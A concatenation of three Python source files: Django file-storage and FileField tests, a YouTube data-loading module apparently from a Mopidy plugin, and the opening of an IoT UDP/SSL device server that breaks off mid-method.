f1.chunks = failing_chunks
with self.assertRaises(OSError):
self.storage.save("error.file", f1)
def test_delete_no_name(self):
"""
Calling delete with an empty name should not try to remove the base
storage directory, but fail loudly (#20660).
"""
msg = "The name must be given to delete()."
with self.assertRaisesMessage(ValueError, msg):
self.storage.delete(None)
with self.assertRaisesMessage(ValueError, msg):
self.storage.delete("")
def test_delete_deletes_directories(self):
tmp_dir = tempfile.mkdtemp(dir=self.storage.location)
self.storage.delete(tmp_dir)
self.assertFalse(os.path.exists(tmp_dir))
@override_settings(
MEDIA_ROOT="media_root",
MEDIA_URL="media_url/",
FILE_UPLOAD_PERMISSIONS=0o777,
FILE_UPLOAD_DIRECTORY_PERMISSIONS=0o777,
)
def test_setting_changed(self):
"""
Properties using settings values as defaults should be updated on
referenced settings change while specified values should be unchanged.
"""
storage = self.storage_class(
location="explicit_location",
base_url="explicit_base_url/",
file_permissions_mode=0o666,
directory_permissions_mode=0o666,
)
defaults_storage = self.storage_class()
settings = {
"MEDIA_ROOT": "overridden_media_root",
"MEDIA_URL": "/overridden_media_url/",
"FILE_UPLOAD_PERMISSIONS": 0o333,
"FILE_UPLOAD_DIRECTORY_PERMISSIONS": 0o333,
}
with self.settings(**settings):
self.assertEqual(storage.base_location, "explicit_location")
self.assertIn("explicit_location", storage.location)
self.assertEqual(storage.base_url, "explicit_base_url/")
self.assertEqual(storage.file_permissions_mode, 0o666)
self.assertEqual(storage.directory_permissions_mode, 0o666)
self.assertEqual(defaults_storage.base_location, settings["MEDIA_ROOT"])
self.assertIn(settings["MEDIA_ROOT"], defaults_storage.location)
self.assertEqual(defaults_storage.base_url, settings["MEDIA_URL"])
self.assertEqual(
defaults_storage.file_permissions_mode,
settings["FILE_UPLOAD_PERMISSIONS"],
)
self.assertEqual(
defaults_storage.directory_permissions_mode,
settings["FILE_UPLOAD_DIRECTORY_PERMISSIONS"],
)
def test_file_methods_pathlib_path(self):
p = Path("test.file")
self.assertFalse(self.storage.exists(p))
f = ContentFile("custom contents")
f_name = self.storage.save(p, f)
# Storage basic methods.
self.assertEqual(self.storage.path(p), os.path.join(self.temp_dir, p))
self.assertEqual(self.storage.size(p), 15)
self.assertEqual(self.storage.url(p), self.storage.base_url + f_name)
with self.storage.open(p) as f:
self.assertEqual(f.read(), b"custom contents")
self.addCleanup(self.storage.delete, p)
class CustomStorage(FileSystemStorage):
def get_available_name(self, name, max_length=None):
"""
Append numbers to duplicate files rather than underscores, like Trac.
"""
basename, *ext = os.path.splitext(name)
number = 2
while self.exists(name):
name = "".join([basename, ".", str(number)] + ext)
number += 1
return name
class CustomStorageTests(FileStorageTests):
storage_class = CustomStorage
def test_custom_get_available_name(self):
first = self.storage.save("custom_storage", ContentFile("custom contents"))
self.assertEqual(first, "custom_storage")
second = self.storage.save("custom_storage", ContentFile("more contents"))
self.assertEqual(second, "custom_storage.2")
self.storage.delete(first)
self.storage.delete(second)
class OverwritingStorage(FileSystemStorage):
"""
Overwrite existing files instead of appending a suffix to generate an
unused name.
"""
# Mask out O_EXCL so os.open() doesn't raise OSError if the file exists.
OS_OPEN_FLAGS = FileSystemStorage.OS_OPEN_FLAGS & ~os.O_EXCL
def get_available_name(self, name, max_length=None):
"""Override the effort to find an used name."""
return name
class OverwritingStorageTests(FileStorageTests):
storage_class = OverwritingStorage
def test_save_overwrite_behavior(self):
"""Saving to same file name twice overwrites the first file."""
name = "test.file"
self.assertFalse(self.storage.exists(name))
content_1 = b"content one"
content_2 = b"second content"
f_1 = ContentFile(content_1)
f_2 = ContentFile(content_2)
stored_name_1 = self.storage.save(name, f_1)
try:
self.assertEqual(stored_name_1, name)
self.assertTrue(self.storage.exists(name))
self.assertTrue(os.path.exists(os.path.join(self.temp_dir, name)))
with self.storage.open(name) as fp:
self.assertEqual(fp.read(), content_1)
stored_name_2 = self.storage.save(name, f_2)
self.assertEqual(stored_name_2, name)
self.assertTrue(self.storage.exists(name))
self.assertTrue(os.path.exists(os.path.join(self.temp_dir, name)))
with self.storage.open(name) as fp:
self.assertEqual(fp.read(), content_2)
finally:
self.storage.delete(name)
class DiscardingFalseContentStorage(FileSystemStorage):
def _save(self, name, content):
if content:
return super()._save(name, content)
return ""
class DiscardingFalseContentStorageTests(FileStorageTests):
storage_class = DiscardingFalseContentStorage
def test_custom_storage_discarding_empty_content(self):
"""
When Storage.save() wraps a file-like object in File, it should include
the name argument so that bool(file) evaluates to True (#26495).
"""
output = StringIO("content")
self.storage.save("tests/stringio", output)
self.assertTrue(self.storage.exists("tests/stringio"))
with self.storage.open("tests/stringio") as f:
self.assertEqual(f.read(), b"content")
class FileFieldStorageTests(TestCase):
def tearDown(self):
shutil.rmtree(temp_storage_location)
def _storage_max_filename_length(self, storage):
"""
Query filesystem for maximum filename length (e.g. AUFS has 242).
"""
dir_to_test = storage.location
while not os.path.exists(dir_to_test):
dir_to_test = os.path.dirname(dir_to_test)
try:
return os.pathconf(dir_to_test, "PC_NAME_MAX")
except Exception:
return 255 # Should be safe on most backends
def test_files(self):
self.assertIsInstance(Storage.normal, FileDescriptor)
# An object without a file has limited functionality.
obj1 = Storage()
self.assertEqual(obj1.normal.name, "")
with self.assertRaises(ValueError):
obj1.normal.size
# Saving a file enables full functionality.
obj1.normal.save("django_test.txt", ContentFile("content"))
self.assertEqual(obj1.normal.name, "tests/django_test.txt")
self.assertEqual(obj1.normal.size, 7)
self.assertEqual(obj1.normal.read(), b"content")
obj1.normal.close()
# File objects can be assigned to FileField attributes, but shouldn't
# get committed until the model it's attached to is saved.
obj1.normal = SimpleUploadedFile("assignment.txt", b"content")
dirs, files = temp_storage.listdir("tests")
self.assertEqual(dirs, [])
self.assertNotIn("assignment.txt", files)
obj1.save()
dirs, files = temp_storage.listdir("tests")
self.assertEqual(sorted(files), ["assignment.txt", "django_test.txt"])
# Save another file with the same name.
obj2 = Storage()
obj2.normal.save("django_test.txt", ContentFile("more content"))
obj2_name = obj2.normal.name
self.assertRegex(obj2_name, "tests/django_test_%s.txt" % FILE_SUFFIX_REGEX)
self.assertEqual(obj2.normal.size, 12)
obj2.normal.close()
# Deleting an object does not delete the file it uses.
obj2.delete()
obj2.normal.save("django_test.txt", ContentFile("more content"))
self.assertNotEqual(obj2_name, obj2.normal.name)
self.assertRegex(
obj2.normal.name, "tests/django_test_%s.txt" % FILE_SUFFIX_REGEX
)
obj2.normal.close()
def test_filefield_read(self):
# Files can be read in a little at a time, if necessary.
obj = Storage.objects.create(
normal=SimpleUploadedFile("assignment.txt", b"content")
)
obj.normal.open()
self.assertEqual(obj.normal.read(3), b"con")
self.assertEqual(obj.normal.read(), b"tent")
self.assertEqual(
list(obj.normal.chunks(chunk_size=2)), [b"co", b"nt", b"en", b"t"]
)
obj.normal.close()
def test_filefield_write(self):
# Files can be written to.
obj = Storage.objects.create(
normal=SimpleUploadedFile("rewritten.txt", b"content")
)
with obj.normal as normal:
normal.open("wb")
normal.write(b"updated")
obj.refresh_from_db()
self.assertEqual(obj.normal.read(), b"updated")
obj.normal.close()
def test_filefield_reopen(self):
obj = Storage.objects.create(
normal=SimpleUploadedFile("reopen.txt", b"content")
)
with obj.normal as normal:
normal.open()
obj.normal.open()
obj.normal.file.seek(0)
obj.normal.close()
def test_duplicate_filename(self):
# Multiple files with the same name get _(7 random chars) appended to them.
objs = [Storage() for i in range(2)]
for o in objs:
o.normal.save("multiple_files.txt", ContentFile("Same Content"))
try:
names = [o.normal.name for o in objs]
self.assertEqual(names[0], "tests/multiple_files.txt")
self.assertRegex(
names[1], "tests/multiple_files_%s.txt" % FILE_SUFFIX_REGEX
)
finally:
for o in objs:
o.delete()
def test_file_truncation(self):
# Given the max_length is limited, when multiple files get uploaded
# under the same name, then the filename get truncated in order to fit
# in _(7 random chars). When most of the max_length is taken by
# dirname + extension and there are not enough characters in the
# filename to truncate, an exception should be raised.
objs = [Storage() for i in range(2)]
filename = "filename.ext"
for o in objs:
o.limited_length.save(filename, ContentFile("Same Content"))
try:
# Testing truncation.
names = [o.limited_length.name for o in objs]
self.assertEqual(names[0], "tests/%s" % filename)
self.assertRegex(names[1], "tests/fi_%s.ext" % FILE_SUFFIX_REGEX)
# Testing exception is raised when filename is too short to truncate.
filename = "short.longext"
objs[0].limited_length.save(filename, ContentFile("Same Content"))
with self.assertRaisesMessage(
SuspiciousFileOperation, "Storage can not find an available filename"
):
objs[1].limited_length.save(*(filename, ContentFile("Same Content")))
finally:
for o in objs:
o.delete()
@unittest.skipIf(
sys.platform == "win32",
"Windows supports at most 260 characters in a path.",
)
def test_extended_length_storage(self):
# Testing FileField with max_length > 255. Most systems have filename
# length limitation of 255. Path takes extra chars.
filename = (
self._storage_max_filename_length(temp_storage) - 4
) * "a" # 4 chars for extension.
obj = Storage()
obj.extended_length.save("%s.txt" % filename, ContentFile("Same Content"))
self.assertEqual(obj.extended_length.name, "tests/%s.txt" % filename)
self.assertEqual(obj.extended_length.read(), b"Same Content")
obj.extended_length.close()
def test_filefield_default(self):
# Default values allow an object to access a single file.
temp_storage.save("tests/default.txt", ContentFile("default content"))
obj = Storage.objects.create()
self.assertEqual(obj.default.name, "tests/default.txt")
self.assertEqual(obj.default.read(), b"default content")
obj.default.close()
# But it shouldn't be deleted, even if there are no more objects using
# it.
obj.delete()
obj = Storage()
self.assertEqual(obj.default.read(), b"default content")
obj.default.close()
def test_empty_upload_to(self):
# upload_to can be empty, meaning it does not use subdirectory.
obj = Storage()
obj.empty.save("django_test.txt", ContentFile("more content"))
self.assertEqual(obj.empty.name, "django_test.txt")
self.assertEqual(obj.empty.read(), b"more content")
obj.empty.close()
def test_pathlib_upload_to(self):
obj = Storage()
obj.pathlib_callable.save("some_file1.txt", ContentFile("some content"))
self.assertEqual(obj.pathlib_callable.name, "bar/some_file1.txt")
obj.pathlib_direct.save("some_file2.txt", ContentFile("some content"))
self.assertEqual(obj.pathlib_direct.name, "bar/some_file2.txt")
obj.random.close()
def test_random_upload_to(self):
# Verify the fix for #5655, making sure the directory is only
# determined once.
obj = Storage()
obj.random.save("random_file", ContentFile("random content"))
self.assertTrue(obj.random.name.endswith("/random_file"))
obj.random.close()
def test_custom_valid_name_callable_upload_to(self):
"""
Storage.get_valid_name() should be called when upload_to is a callable.
"""
obj = Storage()
obj.custom_valid_name.save("random_file", ContentFile("random content"))
# CustomValidNameStorage.get_valid_name() appends '_valid' to the name
self.assertTrue(obj.custom_valid_name.name.endswith("/random_file_valid"))
obj.custom_valid_name.close()
def test_filefield_pickling(self):
# Push an object into the cache to make sure it pickles properly
obj = Storage()
obj.normal.save("django_test.txt", ContentFile("more content"))
obj.normal.close()
cache.set("obj", obj)
self.assertEqual(cache.get("obj").normal.name, "tests/django_test.txt")
def test_file_object(self):
# Create sample file
temp_storage.save("tests/example.txt", ContentFile("some content"))
# Load it as Python file object
with open(temp_storage.path("tests/example.txt")) as file_obj:
# Save it using storage and read its content
temp_storage.save("tests/file_obj", file_obj)
self.assertTrue(temp_storage.exists("tests/file_obj"))
with temp_storage.open("tests/file_obj") as f:
self.assertEqual(f.read(), b"some content")
def test_stringio(self):
# Test passing StringIO instance as content argument to save
output = StringIO()
output.write("content")
output.seek(0)
# Save it and read written file
temp_storage.save("tests/stringio", output)
self.assertTrue(temp_storage.exists("tests/stringio"))
with temp_storage.open("tests/stringio") as f:
self.assertEqual(f.read(), b"content")
class FieldCallableFileStorageTests(SimpleTestCase):
def setUp(self):
self.temp_storage_location = tempfile.mkdtemp(
suffix="filefield_callable_storage"
)
def tearDown(self):
shutil.rmtree(self.temp_storage_location)
def test_callable_base_class_error_raises(self):
class NotStorage:
pass
msg = "FileField.storage must be a subclass/instance of django.core.files.storage.Storage"
for invalid_type in (NotStorage, str, list, set, tuple):
with self.subTest(invalid_type=invalid_type):
with self.assertRaisesMessage(TypeError, msg):
FileField(storage=invalid_type)
def test_file_field_storage_none_uses_default_storage(self):
self.assertEqual(FileField().storage, default_storage)
def test_callable_function_storage_file_field(self):
storage = FileSystemStorage(location=self.temp_storage_location)
def get_storage():
return storage
obj = FileField(storage=get_storage)
self.assertEqual(obj.storage, storage)
self.assertEqual(obj.storage.location, storage.location)
def test_callable_class_storage_file_field(self):
class GetStorage(FileSystemStorage):
pass
obj = FileField(storage=GetStorage)
self.assertIsInstance(obj.storage, BaseStorage)
def test_callable_storage_file_field_in_model(self):
obj = Storage()
self.assertEqual(obj.storage_callable.storage, temp_storage)
self.assertEqual(obj.storage_callable.storage.location, temp_storage_location)
self.assertIsInstance(obj.storage_callable_class.storage, BaseStorage)
def test_deconstruction(self):
"""
Deconstructing gives the original callable, not the evaluated value.
"""
obj = Storage()
*_, kwargs = obj._meta.get_field("storage_callable").deconstruct()
storage = kwargs["storage"]
self.assertIs(storage, callable_storage)
# Tests for a race condition on file saving (#4948).
# This is written in such a way that it'll always pass on platforms
# without threading.
class SlowFile(ContentFile):
def chunks(self):
time.sleep(1)
return super().chunks()
class FileSaveRaceConditionTest(SimpleTestCase):
def setUp(self):
self.storage_dir = tempfile.mkdtemp()
self.storage = FileSystemStorage(self.storage_dir)
self.thread = threading.Thread(target=self.save_file, args=["conflict"])
def tearDown(self):
shutil.rmtree(self.storage_dir)
def save_file(self, name):
name = self.storage.save(name, SlowFile(b"Data"))
def test_race_condition(self):
self.thread.start()
self.save_file("conflict")
self.thread.join()
files = sorted(os.listdir(self.storage_dir))
self.assertEqual(files[0], "conflict")
self.assertRegex(files[1], "conflict_%s" % FILE_SUFFIX_REGEX)
@unittest.skipIf(
sys.platform == "win32", "Windows only partially supports umasks and chmod."
)
class FileStoragePermissions(unittest.TestCase):
def setUp(self):
self.umask = 0o027
self.old_umask = os.umask(self.umask)
self.storage_dir = tempfile.mkdtemp()
def tearDown(self):
shutil.rmtree(self.storage_dir)
os.umask(self.old_umask)
@override_settings(FILE_UPLOAD_PERMISSIONS=0o654)
def test_file_upload_permissions(self):
self.storage = FileSystemStorage(self.storage_dir)
name = self.storage.save("the_file", ContentFile("data"))
actual_mode = os.stat(self.storage.path(name))[0] & 0o777
self.assertEqual(actual_mode, 0o654)
@override_settings(FILE_UPLOAD_PERMISSIONS=None)
def test_file_upload_default_permissions(self):
self.storage = FileSystemStorage(self.storage_dir)
fname = self.storage.save("some_file", ContentFile("data"))
mode = os.stat(self.storage.path(fname))[0] & 0o777
self.assertEqual(mode, 0o666 & ~self.umask)
@override_settings(FILE_UPLOAD_DIRECTORY_PERMISSIONS=0o765)
def test_file_upload_directory_permissions(self):
self.storage = FileSystemStorage(self.storage_dir)
name = self.storage.save("the_directory/subdir/the_file", ContentFile("data"))
file_path = Path(self.storage.path(name))
self.assertEqual(file_path.parent.stat().st_mode & 0o777, 0o765)
self.assertEqual(file_path.parent.parent.stat().st_mode & 0o777, 0o765)
@override_settings(FILE_UPLOAD_DIRECTORY_PERMISSIONS=None)
def test_file_upload_directory_default_permissions(self):
self.storage = FileSystemStorage(self.storage_dir)
name = self.storage.save("the_directory/subdir/the_file", ContentFile("data"))
file_path = Path(self.storage.path(name))
expected_mode = 0o777 & ~self.umask
self.assertEqual(file_path.parent.stat().st_mode & 0o777, expected_mode)
self.assertEqual(file_path.parent.parent.stat().st_mode & 0o777, expected_mode)
class FileStoragePathParsing(SimpleTestCase):
def setUp(self):
self.storage_dir = tempfile.mkdtemp()
self.storage = FileSystemStorage(self.storage_dir)
def tearDown(self):
shutil.rmtree(self.storage_dir)
def test_directory_with_dot(self):
"""Regression test for #9610.
If the directory name contains a dot and the file name doesn't, make
sure we still mangle the file name instead of the directory name.
"""
self.storage.save("dotted.path/test", ContentFile("1"))
self.storage.save("dotted.path/test", ContentFile("2"))
files = sorted(os.listdir(os.path.join(self.storage_dir, "dotted.path")))
self.assertFalse(os.path.exists(os.path.join(self.storage_dir, "dotted_.path")))
self.assertEqual(files[0], "test")
self.assertRegex(files[1], "test_%s" % FILE_SUFFIX_REGEX)
def test_first_character_dot(self):
"""
File names with a dot as their first character don't have an extension,
and the underscore should get added to the end.
"""
self.storage.save("dotted.path/.test", ContentFile("1"))
self.storage.save("dotted.path/.test", ContentFile("2"))
files = sorted(os.listdir(os.path.join(self.storage_dir, "dotted.path")))
self.assertFalse(os.path.exists(os.path.join(self.storage_dir, "dotted_.path")))
self.assertEqual(files[0], ".test")
self.assertRegex(files[1], ".test_%s" % FILE_SUFFIX_REGEX)
class ContentFileStorageTestCase(unittest.TestCase):
def setUp(self):
self.storage_dir = tempfile.mkdtemp()
self.storage = FileSystemStorage(self.storage_dir)
def tearDown(self):
shutil.rmtree(self.storage_dir)
def test_content_saving(self):
"""
ContentFile can be saved correctly with the filesystem storage,
if it was initialized with either bytes or unicode content.
"""
self.storage.save("bytes.txt", ContentFile(b"content"))
self.storage.save("unicode.txt", ContentFile("español"))
@override_settings(ROOT_URLCONF="file_storage.urls")
class FileLikeObjectTestCase(LiveServerTestCase):
"""
Test file-like objects (#15644).
"""
available_apps = []
def setUp(self):
self.temp_dir = tempfile.mkdtemp()
self.storage = FileSystemStorage(location=self.temp_dir)
def tearDown(self):
shutil.rmtree(self.temp_dir)
def test_urllib_request_urlopen(self):
"""
Test the File storage API with a file-like object coming from
urllib.request.urlopen().
"""
file_like_object = urlopen(self.live_server_url + "/")
f = File(file_like_object)
stored_filename = self.storage.save("remote_file.html", f)
remote_file = urlopen(self.live_server_url + "/")
with self.storage.open(stored_filename) as stored_file:
self.assertEqual(stored_file.read(), remote_file.read())
|
youtube.py
|
import re
import threading
import traceback
import pykka
import requests
import youtube_dl
from cachetools import LRUCache, cached
from mopidy.models import Image
from mopidy_youtube import logger
from requests.adapters import HTTPAdapter
from requests.packages.urllib3.util.retry import Retry
api_enabled = False
# decorator for creating async properties using pykka.ThreadingFuture
# A property 'foo' should have a future '_foo'
# On first call we invoke func() which should create the future
# On subsequent calls we just return the future
#
def async_property(func):
_future_name = "_" + func.__name__
def wrapper(self):
if _future_name not in self.__dict__:
func(self) # should create the future
return self.__dict__[_future_name]
return property(wrapper)
# The Video / Playlist classes can be used to load YouTube data. If
# 'api_enabled' is true (and a valid youtube_api_key supplied), most data are
# loaded using the (very much faster) YouTube Data API. If 'api_enabled' is
# false, most data are loaded using requests and regex. Requests and regex
# is many times slower than using the API.
#
# eg
# video = youtube.Video.get('7uj0hOIm2kY')
# video.length # non-blocking, returns future
# ... later ...
# print video.length.get() # blocks until info arrives, if it hasn't already
#
# Entry is a base class of Video and Playlist
#
class Entry:
cache_max_len = 400
# Use Video.get(id), Playlist.get(id), instead of Video(id), Playlist(id),
# to fetch a cached object, if available
#
@classmethod
@cached(cache=LRUCache(maxsize=cache_max_len))
def get(cls, id):
obj = cls()
obj.id = id
return obj
# Search for both videos and playlists using a single API call. Fetches
# only title, thumbnails, channel (extra queries are needed for length and
# video_count)
#
@classmethod
def search(cls, q):
def create_object(item):
set_api_data = ["title", "channel"]
if item["id"]["kind"] == "youtube#video":
obj = Video.get(item["id"]["videoId"])
if "contentDetails" in item:
set_api_data.append("length")
elif item["id"]["kind"] == "youtube#playlist":
obj = Playlist.get(item["id"]["playlistId"])
if "contentDetails" in item:
set_api_data.append("video_count")
# elif item['id']['kind'] == 'youtube#radiolist':
# obj = Video.get(item['id']['videoId'])
# set_api_data = ['title', 'video_count']
else:
obj = []
return obj
if "thumbnails" in item["snippet"]:
set_api_data.append("thumbnails")
obj._set_api_data(set_api_data, item)
return obj
try:
data = cls.api.search(q)
except Exception as e:
logger.error('search error "%s"', e)
return None
try:
return list(map(create_object, data["items"]))
except Exception as e:
logger.error('map error "%s"', e)
return None
# Adds futures for the given fields to all objects in list, unless they
# already exist. Returns objects for which at least one future was added
#
@classmethod
def _add_futures(cls, futures_list, fields):
def add(obj):
added = False
for k in fields:
if "_" + k not in obj.__dict__:
obj.__dict__["_" + k] = pykka.ThreadingFuture()
added = True
return added
return list(filter(add, futures_list))
# common Video/Playlist properties go to the base class
#
@async_property
def title(self):
self.load_info([self])
@async_property
def channel(self):
self.load_info([self])
# sets the given 'fields' of 'self', based on the 'item'
# data retrieved through the API
#
def _set_api_data(self, fields, item):
for k in fields:
_k = "_" + k
future = self.__dict__.get(_k)
if not future:
future = self.__dict__[_k] = pykka.ThreadingFuture()
if not future._queue.empty(): # hack, no public is_set()
continue
if not item:
val = None
elif k == "title":
val = item["snippet"]["title"]
elif k == "channel":
val = item["snippet"]["channelTitle"]
elif k == "length":
# convert PT1H2M10S to 3730
m = re.search(
r"P((?P<weeks>\d+)W)?"
+ r"((?P<days>\d+)D)?"
+ r"T((?P<hours>\d+)H)?"
+ r"((?P<minutes>\d+)M)?"
+ r"((?P<seconds>\d+)S)?",
item["contentDetails"]["duration"],
)
val = (
int(m.group("weeks") or 0) * 604800
+ int(m.group("days") or 0) * 86400
+ int(m.group("hours") or 0) * 3600
+ int(m.group("minutes") or 0) * 60
+ int(m.group("seconds") or 0)
)
elif k == "video_count":
val = min(
int(item["contentDetails"]["itemCount"]),
int(self.playlist_max_videos),
)
elif k == "thumbnails":
val = [
val["url"]
for (key, val) in item["snippet"]["thumbnails"].items()
if key in ["default", "medium", "high"]
]
future.set(val)
class Video(Entry):
# loads title, length, channel of multiple videos using one API call for
# every 50 videos. API calls are split in separate threads.
#
@classmethod
def load_info(cls, list):
fields = ["title", "length", "channel"]
list = cls._add_futures(list, fields)
def job(sublist):
try:
data = cls.api.list_videos([x.id for x in sublist])
dict = {item["id"]: item for item in data["items"]}
except Exception as e:
logger.error('list_videos error "%s"', e)
dict = {}
for video in sublist:
video._set_api_data(fields, dict.get(video.id))
# 50 items at a time, make sure order is deterministic so that HTTP
# requests are replayable in tests
for i in range(0, len(list), 50):
sublist = list[i : i + 50]
ThreadPool.run(job, (sublist,))
@async_property
def length(self):
self.load_info([self])
@async_property
def thumbnails(self):
# make it "async" for uniformity with Playlist.thumbnails
identifier = self.id.split(".")[-1]
self._thumbnails = pykka.ThreadingFuture()
self._thumbnails.set(
[
Image(uri=f"https://i.ytimg.com/vi/{identifier}/{type}.jpg")
for type in ["default", "mqdefault", "hqdefault"]
]
)
# audio_url is the only property retrived using youtube_dl, it's much more
# expensive than the rest
#
@async_property
def audio_url(self):
self._audio_url = pykka.ThreadingFuture()
def job():
try:
info = youtube_dl.YoutubeDL(
{
"format": "bestaudio/best",
"proxy": self.proxy,
"nocheckcertificate": True,
}
).extract_info(
url="https://www.youtube.com/watch?v=%s" % self.id,
download=False,
ie_key=None,
extra_info={},
process=True,
force_generic_extractor=False,
)
except Exception as e:
logger.error('audio_url error "%s"', e)
self._audio_url.set(None)
return
self._audio_url.set(info["url"])
ThreadPool.run(job)
@property
def is_video(self):
return True
class Playlist(Entry):
# loads title, thumbnails, video_count, channel of multiple playlists using
# one API call for every 50 lists. API calls are split in separate threads.
#
@classmethod
def load_info(cls, list):
fields = ["title", "video_count", "thumbnails", "channel"]
list = cls._add_futures(list, fields)
def job(sublist):
try:
data = cls.api.list_playlists([x.id for x in sublist])
dict = {item["id"]: item for item in data["items"]}
except Exception as e:
logger.error('list_playlists error "%s"', e)
dict = {}
for pl in sublist:
pl._set_api_data(fields, dict.get(pl.id))
# 50 items at a time, make sure order is deterministic so that HTTP
# requests are replayable in tests
for i in range(0, len(list), 50):
sublist = list[i : i + 50]
ThreadPool.run(job, (sublist,))
# loads the list of videos of a playlist using one API call for every 50
# fetched videos. For every page fetched, Video.load_info is called to
# start loading video info in a separate thread.
#
@async_property
def videos(self):
self._videos = pykka.ThreadingFuture()
def job():
all_videos = []
page = ""
while (
page is not None and len(all_videos) < self.playlist_max_videos
):
try:
max_results = min(
int(self.playlist_max_videos) - len(all_videos), 50
)
data = self.api.list_playlistitems(
self.id, page, max_results
)
except Exception as e:
logger.error('list playlist items error "%s"', e)
break
if "error" in data:
logger.error("error in list playlist items data")
break
page = data.get("nextPageToken") or None
myvideos = []
for item in data["items"]:
set_api_data = ["title", "channel"]
if "contentDetails" in item:
set_api_data.append("length")
if "thumbnails" in item["snippet"]:
set_api_data.append("thumbnails")
video = Video.get(item["snippet"]["resourceId"]["videoId"])
video._set_api_data(set_api_data, item)
myvideos.append(video)
all_videos += myvideos
# start loading video info for this batch in the background
Video.load_info(
[
x
for _, x in zip(
range(self.playlist_max_videos), myvideos
)
]
) # noqa: E501
self._videos.set(
[x for _, x in zip(range(self.playlist_max_videos), all_videos)]
) # noqa: E501
ThreadPool.run(job)
@async_property
def video_count(self):
self.load_info([self])
@async_property
def thumbnails(self):
self.load_info([self])
@property
def is_video(self):
return False
class Client:
def __init__(self, proxy, headers):
if not hasattr(type(self), "session"):
self._create_session(proxy, headers)
@classmethod
def _create_session(
cls,
proxy,
headers,
retries=3,
backoff_factor=0.3,
status_forcelist=(500, 502, 504),
session=None,
):
cls.session = session or requests.Session()
retry = Retry(
total=retries,
read=retries,
connect=retries,
backoff_factor=backoff_factor,
status_forcelist=status_forcelist,
)
adapter = HTTPAdapter(
max_retries=retry, pool_maxsize=ThreadPool.threads_max
)
cls.session.mount("http://", adapter)
cls.session.mount("https://", adapter)
cls.session.proxies = {"http": proxy, "https": proxy}
cls.session.headers = headers
@classmethod
def format_duration(cls, match):
duration = ""
if match.group("durationHours") is not None:
duration += match.group("durationHours") + "H"
if match.group("durationMinutes") is not None:
duration += match.group("durationMinutes") + "M"
if match.group("durationSeconds") is not None:
duration += match.group("durationSeconds") + "S"
return duration
# simple 'dynamic' thread pool. Threads are created when new jobs arrive, stay
# active for as long as there are active jobs, and get destroyed afterwards
# (so that there are no long-term threads staying active)
#
class ThreadPool:
threads_active = 0
jobs = []
lock = threading.Lock() # controls access to threads_active and jobs
@classmethod
def worker(cls):
while True:
cls.lock.acquire()
if len(cls.jobs):
f, args = cls.jobs.pop()
else:
# no more jobs, exit thread
cls.threads_active -= 1
cls.lock.release()
break
cls.lock.release()
try:
f(*args)
except Exception as e:
logger.error(
"youtube thread error: %s\n%s", e, traceback.format_exc()
)
@classmethod
def run(cls, f, args=()):
cls.lock.acquire()
cls.jobs.append((f, args))
if cls.threads_active < cls.threads_max:
thread = threading.Thread(target=cls.worker)
thread.daemon = True
thread.start()
cls.threads_active += 1
cls.lock.release()
|
iotserver.py
|
from iotcommon import IotUDPHandler
from iotcommon import UdpPacket
import datetime
import iotcommon
import SocketServer
import binascii
import logging
import time
import threading
import os
import socket
import ssl
import sys
import json
class IotSession:
TYPE_UDP = 'udp'
TYPE_SSL = 'ssl'
def __init__(self, deviceId, protocol):
self.protocol = protocol
self.deviceId = deviceId;
self.clientAddr = None
self.lastUdpMessage = None
self.lastPayload = None
self.sslSocket = None
self.creationTime = datetime.datetime.now()
self.lastUpdateTime = datetime.datetime.now()
self.lock = threading.Lock()
class UdpCounter:
def __init__(self, deviceId, udpSentCounter, udpReceivedCounter):
self.deviceId = deviceId;
self.udpSentCounter = udpSentCounter
self.udpReceivedCounter = udpReceivedCounter
class IotServerService:
logger = logging.getLogger()
IOT_PROTOCOL_VERSION = 1
def __init__(self, udpListenAddr, sslListenAddr, masterKey, serverHandler):
self.udpHost, self.udpPort = udpListenAddr.split(':')[0], int(udpListenAddr.split(':')[1])
self.sslHost, self.sslPort = sslListenAddr.split(':')[0], int(sslListenAddr.split(':')[1])
self.udpServer = None
self.udpTimeout = 180
self.sessions = dict()
self.masterKey = masterKey
self.stateFile = 'server.dat'
self.caCertFile = 'servercert.pem'
self.serverCertFile = 'servercert.pem'
self.serverKeyFile = 'serverkey.pem'
self.taskIntervalSecond = 60
self.serverHandler = serverHandler
self.serverHandler.service = self
def start(self):
self.loadState()
self.serverHandler.start()
sslThread = threading.Thread(target = self.startSsl)
sslThread.daemon = True
sslThread.start()
timer = threading.Timer(self.taskIntervalSecond, self.repeat)
timer.daemon = True
timer.start()
self.udpServer = SocketServer.UDPServer((self.udpHost, self.udpPort), IotUDPHandler)
self.logger.info("starting UDP server listening at {0}:{1}".format(self.udpServer.server_address[0], self.udpServer.server_address[1]))
self.udpServer.service = self
self.udpServer.role = IotUDPHandler.SERVER
self.udpServer.serve_forever()
def startSsl(self):
while True:
try:
self.logger.info("starting TCP SSL server listening at {0}:{1}".format(self.sslHost, self.sslPort))
bindsocket = socket.socket()
bindsocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) #bind even if local port is in TIME_WAIT
bindsocket.bind((self.sslHost, self.sslPort))
bindsocket.listen(5)
while True:
newsocket, fromaddr = bindsocket.accept()
try:
self.logger.info("New TCP connection from {0}:{1} - initiating ssl using serverCertFile={2}, serverKeyFile={3}, caCertFile={4}".format(fromaddr[0], fromaddr[1], self.serverCertFile, self.serverKeyFile, self.caCertFile))
sslSocket = ssl.wrap_socket(newsocket, server_side=True,certfile=self.serverCertFile, keyfile=self.serverKeyFile,cert_reqs=ssl.CERT_REQUIRED,ca_certs=self.caCertFile,ssl_version=ssl.PROTOCOL_SSLv23)
sslSocket.settimeout(300)
servercert = sslSocket.getpeercert()
subject = dict(x[0] for x in servercert['subject'])
cn = subject['commonName']
desc = subject['description']
self.logger.info("Client certificate is valid, CN={0}, description={1} - validating deviceId and description".format(cn, desc))
deviceId = str(bytearray.fromhex(cn))
deviceKey = iotcommon.deriveKey(self.masterKey, deviceId)
expectedSignature = binascii.hexlify(iotcommon.hmacsha256(deviceId, deviceKey))
if desc == expectedSignature:
self.logger.debug("certificate signature OK, creating session for device {0} at {1}:{2}".format(cn, fromaddr[0], fromaddr[1]))
if deviceId in self.sessions:
session = self.sessions[deviceId]
session.clientAddr = fromaddr
session.sslSocket = sslSocket
session.lastUpdateTime = datetime.datetime.now()
else:
self.logger.debug(" creating new session for SSL device: %s", binascii.hexlify(deviceId))
session = IotSession(deviceId, IotSession.TYPE_SSL)
session.clientAddr = fromaddr
session.sslSocket = sslSocket
session.lastUpdateTime = datetime.datetime.now()
